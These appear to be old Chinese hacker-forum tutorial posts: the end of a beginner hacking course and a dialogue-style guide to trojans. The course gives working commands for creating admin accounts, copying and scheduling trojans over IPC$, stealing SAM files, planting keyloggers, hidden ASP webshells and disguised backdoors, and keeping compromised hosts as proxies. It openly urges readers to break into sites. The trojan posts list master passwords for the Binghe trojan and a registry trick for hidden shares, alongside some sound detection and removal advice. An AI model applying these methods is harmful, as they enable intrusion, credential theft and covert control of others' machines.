菜鳥學習初級教程-----強烈推薦

<DIV class=tpc_content id=read_495>基礎知識（6）<BR><BR><BR>net user iusr_machinename cshu （把它的密碼設為cshu） <BR><BR>net localgroup administrators iusr_machinename /add（加入administrators組） <BR><BR>這樣我們就擁有了iusr_machinename這一賬號，admin權限，簡單吧！ <BR><BR>熟悉一下net use 命令： <BR><BR>net use \\11.11.22.22\ipc$ "cshu" /user:iusr_machinename 建立連接 <BR><BR>copy c:\haha.exe \\11.11.22.22\admin$ 把haha.exe 復制到機器c:\winnt\system32上，若是c$.d$,就表示c,d盤 <BR><BR>net time \\11.11.22.22 看到了時間了，比如是8點 <BR><BR>at \\11.11.22.22 8:03 haha.exe 就會在8點3分執(zhí)行。 <BR><BR>net use \\11.11.22.22 /delete 斷開連接 <BR><BR>應該是很簡單的。這樣我們就可以隨心所欲地操作11.11.22.22了，admin是最高權限，所以沒有限制的：） <BR><BR>是不是很簡單？所以我是溢出是很厲害的攻擊方法。 <BR><BR>3389知道吧！如果能進入，那么用上面的命令也可以輕易拿到admin的，不過呢，有3389漏洞的機器已經(jīng)不多了?？茨氵\氣了?。ū菊居袔灼P于3389的好文章） <BR><BR>總的來說，還是unicode的機器最多，為什么注意文明用語網(wǎng)管不會滅絕呢：）雖然unicode拿admin有一定難度，但還是要試試的。 <BR><BR>首先，我們檢查一下unicode在這臺機器上的權限，一般看讀寫權限和運行權限。用copy 或del命令便可確定讀寫權限，然后上傳文件運行一下便可知道運行權限。 <BR><BR>1，如果我們可以對winnt\repair和winnt\config進行訪問，sam文件就在里面（win2k里是sam，nt4里是sam._）那么用tftp 把get改成put下載下來，或者把它復制到inetpub\wwwroot下，改成zip下載。 <BR><BR>拿到sam后，用lc3破解版暴力破解吧，這種方法比較費時。 <BR><BR>2，要是有運行權限，拿就拋個木馬上去吧！雖說木馬可能也會沒有權限，但自啟動的模式在admin登陸后可能會自己提升了權限。要注意的是，最好放最新的木馬，因為木馬很容易被殺毒軟件查殺！ <BR><BR>3，其實和2差不多，只不過變成了鍵盤記錄器，選個國產(chǎn)的，一般殺毒軟件不會殺出來，認真配置好后傳上去，下線睡覺或是做家務去！等到網(wǎng)管用了機器，密碼就會被紀錄下來，我們在去取，admin就順利到手了：） <BR><BR>4，getadmin和pipeupadmin，前者是nt4用的，后者是2000。看看幫助知道使用方法后（其實猜都猜得到）就可以提升一個用戶的權限，有一步登天的感覺！ <BR><BR>5，手工做個bat文件，里面是建立用戶等命令，然后把它放到自啟動下，有很多途徑：documents and settings下的開始菜單下的啟動，知道了吧，至于要順利放進去的話，會遇到空格長名等等問題，就看你的基本功了。win.ini里有l(wèi)oad，加進去。還有便是注冊表，好好研究一下regedit. <BR><BR>6，本地溢出。這個比較高深，我能告訴大家的只是，去四處找找本地溢出程序。 <BR><BR>總的來說，unicode改主頁是非常簡單的，但是若是要取得更高的權限，就要一番努力，上面的方法只是些思路，實際操作時需要具體處理，開動腦筋，把方法都結合起來。（是不是聽起來有點玄？） <BR><BR>想想好像沒有什么其他的途徑要說了，什么？linux,呵呵，我還不大懂，就不在這里瞎說了。 <BR><BR>那今天就說到這里了，6里面我會說說后門制作，小問題和我的一點經(jīng)驗。期待吧！ <BR><BR><BR><BR>這是最后一節(jié)了，寫的傻傻的，但我畢竟堅持下來了，值得鼓勵?。ㄅ紶柊一下）在寫菜鳥操的同時，我們的cshu(cshu.51.net)也在默默成長，但現(xiàn)在我要準備離開了，真是有點舍不得。在今后的日子里，還請大家多多支持cshu和christ,freedom他們。 <BR><BR>今天說點什么呢？沒有主題，亂談一通吧！ <BR><BR>首先我要吐一次血，當然是為了推薦一樣東西，就是流光?。敲礇]創(chuàng)意，老土?。┎还茉趺凑f，小榕的流光應該是中國第一黑軟，他綜合了諸多的攻擊手段，使攻擊便捷化，當然可能讓我們養(yǎng)成了懶惰的習慣。不會用流光的最好去學學。 <BR><BR>我來說說我自己覺得最有用的幾個項目： <BR><BR>1，探測----掃描pop3/ftp/nt/sql主機，要是無目的地黑，那么用這個再合適不過了。進去后填好ip范圍（范圍可以掃大一點，它很快的），至于類型嘛，要是你要一大堆unicode，那么選擇iis/frontpage再合適不過了，要是要更高的權限，sql是不錯的選擇。完成后，表格里會多出一大堆東西。 <BR><BR>remote execute-x 這是幾種不同的unicode，用它比用ie來執(zhí)行方便多了，但是echo有問題（是我自己不會，會的朋友快教我） <BR><BR>remote ftp pcaw file method-x 這是遠程獲取pc anywhere的密碼文件，要使用的話，你首先要有一個ftp賬號，去申請吧！順利拿到cif文件后，用流光自帶的工具就可以解開密碼，很爽的！ <BR><BR>remote ftp sam -x 拿sam的，還是用最好的lc3來解吧！ <BR><BR>frontpage extended 這是frontpage擴展，不過不要高興，是要密碼的。但是若是后面跟了privilege hole的話，放聲大笑吧！（小心不要讓鄰居拿著菜刀沖進來）打開frontpage，打開站點， <A href="http://ip/" target=_blank><FONT color=#2f5fa1>http://ip</FONT></A>就可以了?。╤ttp://不要忘） <BR><BR>此外還有一點變通，大家肯定讀的懂的。 <BR><BR>2，探測----高級掃描工具。這可是流光4中的重頭戲，綜合了很多漏洞，還可以用plugin功能加入新的漏洞。這項功能很適合對某一站點進行探測，很快掃出漏洞后，流光會生成一個報告文件，其中包含漏洞的連接，要是你看不懂的話，建議你拿出x-scan，里面有漏洞描述的。 <BR><BR>3，工具----nt管道遠程命令，種植者，這兩項功能對我們攻擊nt來說是相當好用的。但前提是要有賬號，相信在此之前你應該有幾個了吧，那就快點試試吧！ <BR><BR>總的來說，流光的使用是非常簡單的，其中也有不少工具值得我們一用，tools目錄里有一些很好的工具，exploit里則有很多溢出攻擊程序，前提是你應該會c,不會的話我也沒辦法，學會c起碼要看10倍于菜鳥操的資料吧！另外給大家推薦一個站點：<A href="http://www.hack.co.za/" target=_blank><FONT color=#2f5fa1>www.hack.co.za</FONT></A>，有什么漏洞的話就去那里找找，你會有所收獲的。 <BR><BR><BR>然后我想說說一些黑站的經(jīng)驗。 <BR><BR>☆當我們用unicode控制一臺機器時，我向大家推薦用asp木馬，阿新的改良版，本站有下載的。上傳asp文件前不要忘了修改list.asp中的地址信息，最好也放一個cmd.asp上去，運氣好的話，可以運行命令的。 <BR><BR>上傳好后，ie里輸入其中index.asp的地址，呵呵，我們就能方便地管理其中的文件了，可以改網(wǎng)頁，改代碼，上傳腳本文件麻煩？那就用它來生成吧！ <BR><BR>推薦他的最大原因便是----便于隱藏！一般網(wǎng)站總有一個龐大的目錄，選擇一個深的，放進去，網(wǎng)管很難發(fā)現(xiàn)的：） <BR><BR>最后對大家說一句，要是有備份目錄（很多網(wǎng)站都有的），最好也放一份進去。有一次我用這個東西修改一家網(wǎng)站的首頁，改了兩三次網(wǎng)管也沒刪掉，可是突然一天不行了，原來他用了備份的網(wǎng)頁（還算機靈吧） <BR><BR>☆我想對大家說，對于國內(nèi)網(wǎng)站，最好不要惡意去攻擊，因為我們是中國人嘛！在5/1期間，我發(fā)現(xiàn)有一些國內(nèi)站點被黑，留下的頁面上不是poison box，而是中國人的話，這真是無恥到了極點！?。?！大家千萬不要學哦。還有，現(xiàn)在網(wǎng)上有很多還沒有網(wǎng)頁的主機，往往有很多漏洞，對于這種機器，竟有一些小人也會去改收頁（比如上海那個姓楊的小子）這算什么？顯示實力，炫耀技術？呵呵，見鬼去吧！ <BR><BR>我的建議是，不要改它的首頁，而是努力去拿admin,控制它，這樣我們有很多選擇：肉雞，等它有正式主頁后可以黑，或者把我們的主頁放上去！比申請好多了，權限又足！當然很危險：）這樣做是不是有品位多了？ <BR><BR>☆要是我們拿到了admin，但有時卻不能執(zhí)行一些命令，那很可能是因為服務啟動的問題。試著用以下命令： <BR><BR>net start termservice 啟動win2k的終端控制 <BR><BR>net start workstation 打開net use 功能 <BR><BR>net start lanmanserver 打開ipc <BR><BR>net start eventlog 啟動日志（你不會那么傻吧！stop） <BR><BR>net start schedule 打開計劃(at) <BR><BR>net start server 共享 <BR><BR>還有很多，net命令里去找吧！ <BR><BR>☆打開telnet <BR><BR>1，遠程去運行ntlm.exe，流光里有 <BR><BR>2，net stop telnet <BR><BR>3, net start telnet <BR><BR>☆我推薦幾種后門：winshell（默認端口5277）相對于srv，它好一些。remotenc這個是榕哥的作品，可以以指定用戶執(zhí)行，還可以自己起服務的名字，很棒的！ <BR><BR>至于服務的名字，建議大家去看看win2k的進程名，學著起相類似的名字，要做到使網(wǎng)管看到了也不會引起警覺，或是有警覺也不敢去刪，呵呵，這樣就最好了！ <BR><BR>☆代理問題。我推薦大家自己去做代理，控制了一臺機器后，用snake前輩寫的skserver去做個sock5。 <BR><BR>具體做法就不詳細說了，因為比較普通，只要熟悉一下用法就可以了。 <BR><BR>做好了sock5，我們可以上oicq，下棋都用它，sock5代理可是很少見的哦！ <BR><BR>要是實在拿不到sock5,用http也可以，這里推薦一個軟件tcp2http，它具有很多功能。在給個站點：dzc.126.com國內(nèi)最最好的的代理站點，怕死的朋友千萬不要錯過。 <BR><BR>最后說說一些對于菜鳥同志的建議： <BR><BR>不要把黑當作一種顯示自己的行為，要是你想耍威風，用url欺騙來騙mm最合適了，還可以弄個yahoo什么的…… <BR><BR>不要在一項技術上停留過長時間，當你熟練掌握后，應該迅速學習下一個新技術。 <BR><BR>不要和被你黑的網(wǎng)管過多接觸，前車之鑒哦。 <BR><BR>對于一臺好機器要做好后門，不要輕易失去它。 <BR><BR>想好好學黑客的話，就常去各大論壇轉(zhuǎn)轉(zhuǎn)，仔細讀教程，忘記聊天室和網(wǎng)絡游戲吧！ <BR><BR>實踐是最好的教程，再次重申！ <BR><BR>應該多學計算機的其他方面的知識，任何知識在一定場合都是有用的。 <BR><BR>編程技術……好像太難了，不過再難也要學。 <BR><BR>想不出來了……………… <BR><BR>好了，我們的菜鳥操終于結束了，我這個大菜鳥也可以退休了，拼搏一年后我會回來的。第一節(jié)里我曾許諾讓大家學會黑站，不知道大家是否成功了，不管這么樣，我們都該不斷的努力學習，不是嗎?</DIV>

<DIV class=tpc_content id=read_496>黑客常用兵器之木馬篇（上）<BR><BR><BR>“我知道遠程控制是種武器，在十八般兵器中名列第七，木馬呢?” <BR>　　“木馬也是種武器，也是遠程控制。” <BR>　　“既然是遠程控制，為什么要叫做木馬？” <BR>　　“因為這個遠程控制，無論控制了什么都會造成離別。如果它鉤住你的E-Mail，你的E-Mail就要和你離別；如果它鉤住你的QQ，你的QQ就要和你離別?！?<BR>　　“如果它鉤住我的機器，我就和整個網(wǎng)絡離別了?” <BR>　　“是的?！?<BR>　　“你為什么要用如此殘酷的武器?” <BR>　　“因為我不愿被人強迫與我所愛的人離別。” <BR>　　“我明白你的意思了。” <BR>　　“你真的明白?” <BR>　　“你用木馬，只不過為了要相聚?！?<BR>　　“是的?！?<BR><BR>　　一 <BR><BR>　　在眾多的黑客武器中特洛伊木馬（Trojan horse）這種攻擊性武器無論是菜鳥級的黑客愛好，還時研究網(wǎng)絡安全的高手，都視為最愛。雖然有的時候高手將木馬視為卑鄙的手段。但是作為最為有效的攻擊工具，木馬的威力要比其他的黑客工具大得多。 <BR><BR>　　“木馬既然如此有效，為何在Hacker兵器譜中排名靠后？” <BR><BR>　　“因為使用木馬往往不是很光明正大?！?<BR><BR>　　“哦？為何？” <BR><BR>　　“在使用木馬的人群中菜鳥黑客居多，他們往往接觸網(wǎng)絡不久，對黑客技術很感興趣，很想向眾人和朋友顯示一番，但是去駕馭技術不高，不能采取別的方法攻擊。于是木馬這種半自動的傻瓜式且非常有效的攻擊軟件成為了他們的最愛。而且隨著國產(chǎn)化的木馬不斷的出現(xiàn)，多數(shù)黑客的入門攻擊幾乎無一例外都是使用木馬。當然對于那些黑客老手來說他們也并不是不使用木馬了，他們通常會在得到一個服務器權限的時候植入自己編寫的木馬，以便將來隨時方便進出這臺服務器?！?<BR><BR>　　“但如此一來木馬的名聲不就隨之降低了嗎？” <BR><BR>　　“是的，所以現(xiàn)在的黑客高手都恥于用木馬，更恥于黑個人的計算機?！?<BR><BR>　　“不過木馬在很多人的眼中仍然是一等一的絕好兵器?！?<BR>在眾多的木馬之中Cult of Dead Cow開發(fā)的Back Orific2000應該算是名氣比較大的一個。這款軟件是在Back Orific2.1的基礎之上開發(fā)的，但是他最大的改動就是增加了對Windows NT服務器系列的支持。作為微軟的高端產(chǎn)品，BO2000的這個功能無疑對Windows NT來說是致命的，就Windows NT本身而言，由于硬盤采取了NTSF的加密，普通的木馬，包括冰河也無法控制，當然要想要讓多數(shù)木馬無法對Windows NT發(fā)揮作用最好將Windows NT轉(zhuǎn)化為NTSF的格式下才會比較好用一些。 <BR><BR>　　而正因為如此BO2000才深得黑客高手的喜愛，因為他們感興趣的也只有服務器，也只有Web Server才能夠提起他們的胃口，那是一種來自深層感官的刺激。 <BR><BR>　　通常情況下木馬大致可分為兩個部分：服務器端程序和客戶端程序。服務器端通常就是被控制端，也是我們傳統(tǒng)概念上的木馬了。 <BR><BR>　　二 <BR><BR>　　“你說BO2000好，但是絕大多數(shù)的殺毒招數(shù)都能夠溝將其制服，而且我感覺他在使用上不如我手里的冰河銳利，況且我也不想黑什么服務器。我認為，個人電腦中隱藏有更大的寶藏，而且個人電腦脆弱的我能夠利用任何一種方法摧毀它。 <BR><BR>　　“你說的很對，冰河確實銳利，而且稱霸中華江湖一年之久，也可謂武林中少見的好兵刃，但是兵器雖然鋒利，但兵器在打造的時候卻留下來一個致命的缺點，這也是木馬冰河為何在武林衰敗的原因。” <BR><BR>　　“這是一個什么樣的弱點那？竟然如此致命？” <BR><BR>　　“呵呵，說白了也很簡單，冰河的作者在打造冰河2.X版本時就給它留下了一個后門，這個后門其實就是一個萬能密碼，只要擁有此密碼，即便你中的冰河加了密碼保護，到時候仍然行同虛設?！?<BR><BR>　　“什么！真有此事？想我許多朋友還因為冰河好用把它當作了一個免費的遠程控制程序來用，如此這般，他們的機子豈不暴露無遺？” <BR><BR>　　“呵呵，在黑客中瞞天過海、借花獻佛這些陰險的招數(shù)都不算什么，多數(shù)木馬軟件的作者為了擴大自己的勢力范圍和爭取主動權都會留一手，致命的一招。冰河的作者當然也不例外，而且由于作者鐘愛許美靜，所以每一個冰河中都包含許美靜的歌詞。當然作者為自己以后行事方便也留了幾個萬能密碼?！?<BR><BR>　　“噢？萬能密碼？” <BR><BR>　　“通常黑客在植入冰河這種木馬的時候，為了維護自己的領地通常的要為自己的獵物加一個密碼，只有輸入正確的密碼你才能夠正常的控制對方的計算機，但是冰河的打造者為了方便自己的使用在冰河中加入了一個萬能的密碼，就像萬能鑰匙一樣。冰河各版本的通用密碼： <BR><BR>　　2.2版：Can you speak Chinese? <BR>　　2.2版：05181977 <BR>　　3.0版：yzkzero! <BR>　　4.0版：05181977 <BR>　　3.0版：yzkzero.51.net <BR>　　3.0版：yzkzero! <BR>　　3.1-netbug版密碼: 123456!@ <BR>　　2.2殺手專版：05181977 <BR>　　2.2殺手專版：dzq20000! <BR><BR>你可以試試看，是不是很輕松的就能夠進入任何一臺有冰河服務器端的電腦？” <BR><BR>　　“真的進入了，果然有此事情，怪不得現(xiàn)在很多人都不再使用冰河。” <BR><BR>　　“此外冰河還存在著兩個嚴重的漏洞： <BR><BR>　　漏洞一：不需要密碼遠程運行本地文件漏洞。 <BR><BR>　　具體的操作方法如下：我們選擇使用相應的冰河客戶端，2.2版以上服務端用2.2版客戶端，1.2版服務端需要使用1.2版客戶端控制。打開客戶端程序G_Client，進入文件管理器，展開“我的電腦”選中任一個本地文件按右鍵彈出選擇菜單，選擇“遠程打開”這時會報告口令錯誤，但是文件一樣能上傳并運行。 <BR><BR>　　任何人都可以利用這個漏洞上傳一個冰河服務端就可以輕松獲得機器的生死權限了，如果你高興的話，還可以上傳病毒和其它的木馬。 <BR><BR>　　漏洞二：不需要密碼就能用發(fā)送信息命令發(fā)送信息，不是用冰河信使，而是用控制類命令的發(fā)發(fā)送信息命令?！?<BR><BR>　　“當然這的確是一個原因，但更主要的是現(xiàn)在的多數(shù)殺毒軟件都能克制冰河?！?<BR><BR>　　三 <BR><BR>　　木馬通常會在三個地方做手腳：注冊表、win.ini、system.ini。這三個文件都是電腦啟動的時候需要加載到系統(tǒng)的重要文件，絕大部分木馬使用這三種方式進行隨機啟動。當然也有利用捆綁軟件方式啟動的木馬，木馬phAse 1.0版本和NetBus 1.53版本就可以以捆綁方式裝到目標電腦上，可以捆綁到啟動程序上，也可以捆綁到一般程序的常用程序上。如果木馬捆綁到一般的程序上，啟動是不確定的，這要看目標電腦主人了，如果他不運行，木馬就不會進入內(nèi)存。捆綁方式是一種手動的安裝方式，一般捆綁的是非自動方式啟動的木馬。非捆綁方式的木馬因為會在注冊表等位置留下痕跡，所以，很容易被發(fā)現(xiàn)，而捆綁木馬可以由黑客自己確定捆綁方式、捆綁位置、捆綁程序等，位置的多變使木馬有很強的隱蔽性。 <BR><BR>　　“在眾多木馬中，大多數(shù)都會將自己隱藏在Windows系統(tǒng)下面，通常為C:\Windows\目錄或者C:\Windows\system\與C:\Windows\system32下隱藏?！?<BR><BR>　　“眾多的目錄中為何選擇這兩個目錄？” <BR><BR>　　“呵呵，當然是為了便于隱蔽。通常這幾個目錄為計算機的系統(tǒng)目錄，其中的文件數(shù)量多而繁雜，很不容易辨別哪些是良性程序哪些是惡性程序，即便高手往往也會有失誤刪除的情況。而且，即便放置在系統(tǒng)目錄下，就多數(shù)為重要的文件，這些文件的誤刪除往往會直接導致系統(tǒng)嚴重的癱瘓?！?<BR><BR>　　“原來如此?！?<BR><BR>　　“前輩，木馬冰河是否也做了這些手腳？” <BR><BR>　　“這是自然，木馬一旦被植入目標計算機中要做的最重要的事就是如何在每次用戶啟動時自動裝載服務端。冰河也是如此了。首先，冰河會在你的注冊表中的HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run和RUNSERVICE 鍵值中加上了\kernl32.exe(是系統(tǒng)目錄)， <BR><BR>　　§c:\改動前的RUN下 <BR>　　默認="" <BR>　　§c:\改動后的RUN下 <BR>　　默認="C:\\WINDOWS\\SYSTEM\\Kernel32.exe" <BR>　　§c:\改動前RunServices下 <BR>　　默認="" <BR>　　§c:\改動后RunServices下 <BR>　　默認="C:\\WINDOWS\\SYSTEM\\Kernel32.exe" <BR>　　§c:\改動前[　　HKEY_LOCAL_MACHINE\Software\CLASSES\txtfile\shell\open\command]的： <BR>　　默認="Notepad.exe %1" <BR>　　§c:\改動后[　　HKEY_LOCAL_MACHINE\Software\CLASSES\txtfile\shell\open\command]的： <BR>　　默認="C:\\WINDOWS\\SYSTEM\\Sysexplr.exe %1" <BR><BR>可以看出之所以冰河可以自我恢復主要靠的是C:\\WINDOWS\\SYSTEM\\Sysexplr.exe，而且冰河服務器端的編制是加密的，沒法簡單的通過改注冊表得到或換掉。另外值得一提的是，即便你刪除了這個鍵值，也并非平安大吉，冰河還會隨時出來給你搗亂，主要因為冰河的服務端也會在c:\windows目錄下生成一個叫 sysexplr.exe文件，當然這個目錄會隨你windows的安裝目錄變化而變化。 <BR>　 <BR>　　“這個文件名好像超級解霸啊，冰河竟然如此狠毒。” <BR><BR>　　“哈哈哈哈，你說的很對，也很聰明，這個文件的確很像超級解霸，但是這還是不夠稱得上為陰險，最為陰險的是這個文件是與文本文件相關聯(lián)的，只要你打開文本，sysexplr.exe程序就會重新生成一個krnel32.exe，此時你的電腦還是被冰河控制著。而且如果你失誤將sysexplr.exe程序破壞，你計算機的文本文件將無法打開?！?<BR><BR>　　木馬都會很注意自己的端口，多達六萬多中的端口很容易讓我們迷失其中，如果你留意的話就會發(fā)現(xiàn)，通常情況下木馬端口一般都在1000以上，并朝著越來越大的趨勢發(fā)展。這主要是因為1000以下的端口是常用端口，況且用時占用這些端口可能會造成系統(tǒng)不正常，木馬也就會很容易暴露；此外使用大的端口也會讓你比較難發(fā)現(xiàn)隱藏其中的木馬，如果使用遠程掃描端口的方式查找木馬，端口數(shù)越大，需要掃描的時間也就越多，故而使用諸如8765的端口會讓你很難發(fā)現(xiàn)隱藏在其中的木馬。 <BR><BR>　　四 <BR><BR>　　“既然木馬如此的陰險，那么前輩有何可知木馬的方法啊？” <BR><BR>　　“現(xiàn)在的木馬雖然陰險，但終究逃不過幾個道理。平時出名的木馬，殺毒軟件就多數(shù)能夠?qū)Ω?。但是現(xiàn)在木馬種類繁多，有很多殺毒軟件對付不了的。但是，只要我們謹記一下幾個方法，就能夠手到擒來。” <BR><BR>　　“首先，我們可以選擇端口掃描來進行判斷，因為木馬在被植入計算機后會打開計算機的端口，我們可以根據(jù)端口列表對計算機的端口進行分析。此外，查看連接也是一種好辦法，而且在本地機上通過netstat -a（或某個第三方的程序）查看所有的TCP/UDP連接，查看連接要比端口掃描快，而且可以直觀地發(fā)現(xiàn)與我們計算機連接的有哪些IP地址。當然，如果你對系統(tǒng)很熟悉的話，也可以通過檢查注冊表來進行木馬的殺除，但是這個方法不適合于那些菜鳥級用戶。查找木馬特征文件也是一種好方法，就拿冰河來說……” <BR><BR>　　“這個我知道前輩，木馬冰河的特征文件一定是G_Server.exe?！?<BR><BR>　　“那有這么簡單。冰河植入計算機后真正的特征文件是kernl32.exe和sysexlpr.exe?！?<BR><BR>　　“太狠毒了，一個跟系統(tǒng)內(nèi)核文件一樣，一個又像超級解霸。那么前輩我們把這兩個文件刪除掉，這冰河豈不就消失了?！?<BR><BR>　　“的確，你要是在DOS模式下刪除了他們，冰河就被破壞掉了，但是你的計算機隨之會無法打開文本文件，因為你刪除的sysexplr.exe文件是和文本文件關聯(lián)的，你還必須把文本文件跟notepad關聯(lián)上。修改注冊表太危險，你可以在Windows資源管理器中選擇查看菜單的文件夾選項，再選擇文件類型進行編輯。不過最簡單的方法是按住鍵盤上的SHIFT鍵的同時鼠標右擊任何一個TXT為后綴的文本文件，再選擇打開方式，選中〖始終用該程序打開〗，然后找到notepad一項，選擇打開就可以了。” <BR><BR>　　“哈哈，按照前輩這么說來，我們只要抓住了這特征，天下的木馬也奈何不了我們了?！?lt;/DIV>

<DIV class=tpc_content id=read_497>黑客常用兵器之木馬篇（下）<BR><BR><BR>　五 <BR><BR>　　“哈哈，你可知道除了冰河這樣的木馬經(jīng)常使用的隱身技術外，更新、更隱蔽的方法已經(jīng)出現(xiàn)，這就是―驅(qū)動程序及動態(tài)鏈接庫技術。驅(qū)動程序及動態(tài)鏈接庫技術和一般的木馬不同，它基本上擺脫了原有的木馬模式―監(jiān)聽端口，而采用替代系統(tǒng)功能的方法改寫驅(qū)動程序或動態(tài)鏈接庫。這樣做的結果是：系統(tǒng)中沒有增加新的文件所以不能用掃描的方法查殺、不需要打開新的端口所以不能用端口監(jiān)視的方法進行查殺、沒有新的進程所以使用進程查看的方法發(fā)現(xiàn)不了它，也不能用kill進程的方法終止它的運行。在正常運行時木馬幾乎沒有任何的癥狀，而一旦木馬的控制端向被控端發(fā)出特定的信息后，隱藏的程序就立即開始運作。此類木馬通過改寫vxd文件建立隱藏共享的木馬，甚是隱蔽，我們上面的那些方法根本不會對這類木馬起作用。 <BR><BR>　　“可是前輩說的這種木馬晚生并沒有見到啊?！?<BR><BR>笨蛋！你沒有見過，你怎么知道我老人家也沒有見過？告訴你我已經(jīng)看到了一個更加巧妙的木馬，它就是Share。運行Share木馬之前，我先把注冊表以及所有硬盤上的文件數(shù)量、結構用一個監(jiān)控軟件DiskState記錄了起來，這個監(jiān)控軟件使用128bit MD5的技術來捕獲所有文件的狀態(tài)，系統(tǒng)中的任何文件的變動都逃不過他的監(jiān)視，這個軟件均會將它們一一指出?！?<BR><BR>　　“前輩我這里第一次運行Share后，系統(tǒng)好像沒有動靜，使用Dllshow（內(nèi)存進程察看軟件）觀看內(nèi)存進程，似乎也沒有太大的變化。一般木馬都會馬上在內(nèi)存駐留的，或許此木馬修改了硬盤上的文件?！?<BR><BR>　　“好，那么你就接著用DiskState比較運行share.exe前后的記錄?！?<BR><BR>　　“程序顯示windows\applog里面的目錄的一些文件和system.dat、user.dat文件起了變化，并沒有其他文件的增加和修改?！?<BR><BR>　　“系統(tǒng)中的applog目錄里面存放了所有應用程序函數(shù)和程序調(diào)用的情況，而system.dat和user.dat則是組冊表的組成文件。你把applog目錄里面的share.lgc打開來觀看，它的調(diào)用過程是什么？” <BR><BR>　　“調(diào)用過程如下： <BR><BR>　　c15625a0 92110 "C:\WINDOWS\SYSTEM\OLEAUT32.DLL" <BR>　　c1561d40 c1000 "C:\WINDOWS\SYSTEM\OLE32.DLL" <BR>　　c1553520 6000 "C:\WINDOWS\SYSTEM\INDICDLL.DLL" <BR>　　c15d4fd0 2623 "C:\WINDOWS\WIN.INI" <BR>　　c15645b0 8000 "C:\WINDOWS\SYSTEM\SVRAPI.DLL" <BR>　　c1554190 f000 "C:\WINDOWS\SYSTEM\MPR.DLL" <BR>　　c154d180 a1207 "C:\WINDOWS\SYSTEM\USER.EXE" <BR>　　c1555ef0 13000 "C:\WINDOWS\SYSTEM\MSNET32.DLL" <BR><BR>　　但是為什么前輩我們看不到MSWINSCK.OCX或WSOCK2.VXD的調(diào)用呢？如果木馬想要進行網(wǎng)絡通訊，是會使用一些socket調(diào)用的?！?<BR><BR>　　“那么接著你再觀察注冊表的變化?！?<BR>　　“好像在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面，多了幾個鍵值，分別是CJT_A$、CJT_C$、CJT_D$、CJT_E$、CJT_F$，其內(nèi)部鍵值如下： <BR><BR>　　"Flags"=dword:00000302 <BR>　　"Type"=dword:00000000 <BR>　　"Path"="A:\\" 《-----路徑是A到F <BR>　　"Parm2enc"=hex: <BR>　　"Parm1enc"=hex: <BR>　　"Remark"="黑客帝國" <BR>　　” <BR>　　“這就對了，然后你在瀏覽器的地址欄輸入\\111.111.111.1\CJT_C$?！?<BR><BR>　　“??！居然把我的C盤目錄文件顯示出來了?！?<BR>　　“現(xiàn)在你把CJT_C$改成matrix然后重啟計算機，接著在瀏覽器的地址欄輸入\\111.111.111.1\matrix?！?<BR><BR>　　“前輩也顯示C盤目錄文件了，很奇怪的是，在我的電腦里面硬盤看上去并沒有共享?。俊?<BR>　　“哈哈，那你再把"Flags"=dword:00000302的302改成402，reboot計算機?！?<BR><BR>　　“嘻嘻，硬盤共享已顯示出來了。那么如何防止這種木馬那？” <BR>“哈哈哈哈，這種木馬只不過用了一個巧妙的方法隱藏起來而已。你現(xiàn)在把HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面的CJT_A$、CJT_C$、CJT_D$、CJT_E$、CJT_F$全部刪掉。如果你還放心不下，也可以把windows\system\下面的Vserver.vxd（Microsoft 網(wǎng)絡上的文件與打印機共享，虛擬設備驅(qū)動程序）刪掉，再把[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\下的VSERVER鍵值刪掉。這樣就可以了。另外，對于驅(qū)動程序/動態(tài)鏈接庫木馬，有一種方法可以試試，使用Windows的〖系統(tǒng)文件檢查器〗，通過〖開始菜單〗－〖程序〗－〖附件〗－〖系統(tǒng)工具〗－〖系統(tǒng)信息〗－〖工具〗可以運行〖系統(tǒng)文件檢查器〗，用〖系統(tǒng)文件檢查器〗可檢測操作系統(tǒng)文件的完整性，如果這些文件損壞，檢查器可以將其還原，檢查器還可以從安裝盤中解壓縮已壓縮的文件。如果你的驅(qū)動程序或動態(tài)鏈接庫在你沒有升級它們的情況下被改動了，就有可能是木馬，提取改動過的文件可以保證你的系統(tǒng)安全和穩(wěn)定。” <BR><BR>　　六 <BR><BR>　　“此外很多人中木馬都會采用如下手段： <BR><BR>　　1．先跟你套近乎，冒充成漂亮的美眉或者其他的能讓你輕信的人，然后想方設法的騙你點他發(fā)給你的木馬。 <BR><BR>　　2．把木馬用工具和其它的軟件捆綁在一起，然后在對文件名字進行修改，然后修改圖標，利用這些虛假的偽裝欺騙麻痹大意的人。 <BR><BR>　　3．另外一種方法就是把木馬偽裝好后，放在軟件下載站中，著收漁翁之利。 <BR><BR>　　所以我這里提醒你一些常見的問題，首先是不要隨便從小的個人網(wǎng)站上下載軟件，要下也要到比較有名、比較有信譽的站點，通常這些網(wǎng)站的軟件比較安全。其次不要過于相信別人，不能隨便運行別人給的軟件。而且要經(jīng)常檢查自己的系統(tǒng)文件、注冊表、端口等，而且多注意些安全方面的信息。再者就是改掉windows關于隱藏文件后綴名的默認設置，這樣可以讓我們看清楚文件真正的后綴名字。最后要提醒你的是，如果有一天你突然發(fā)現(xiàn)自己的計算機硬盤莫名其妙的工作，或者在沒有打開任何連接的情況下，貓還在眨眼睛，就立刻斷線，進行木馬的搜索?！?lt;/DIV>

<DIV class=tpc_content id=read_498>黑客常用兵器之掃面篇（上）<BR><BR>刀，兵器譜上排名第六。 <BR>　　刀； <BR>　　一把好刀，光亮如雪； <BR>　　刃； <BR>　　一抹利刃，吹發(fā)即斷； <BR><BR>　　黑客手中的掃描器如同刺客手中之刀，殺人、保命；攻擊、補漏。 <BR><BR>　　如果一個黑客手中沒有一兩個掃描器，那么他算不上是一個黑客，至少他是一個手里沒有“刀”的黑客。沒有“刀”的黑客是難以生存的……】 <BR><BR>　　“前輩，您為何如此看好掃描器？為什么黑客必須要有掃描器？” <BR><BR>　　“后生，你上次木馬害我不淺，你這次又像搞什么花樣？” <BR><BR>　　“上次小生只是跟前輩開了一個玩笑，還望前輩見諒?！?<BR><BR>　　“罷了，我老人家還不止于和你如此一般見識。此次你又有什么不清楚的？” <BR><BR>　　“我不太清楚掃描器為何會像您所說的有如此大的威力，掃描器在黑客攻擊中能起到什么作用？” <BR><BR>　　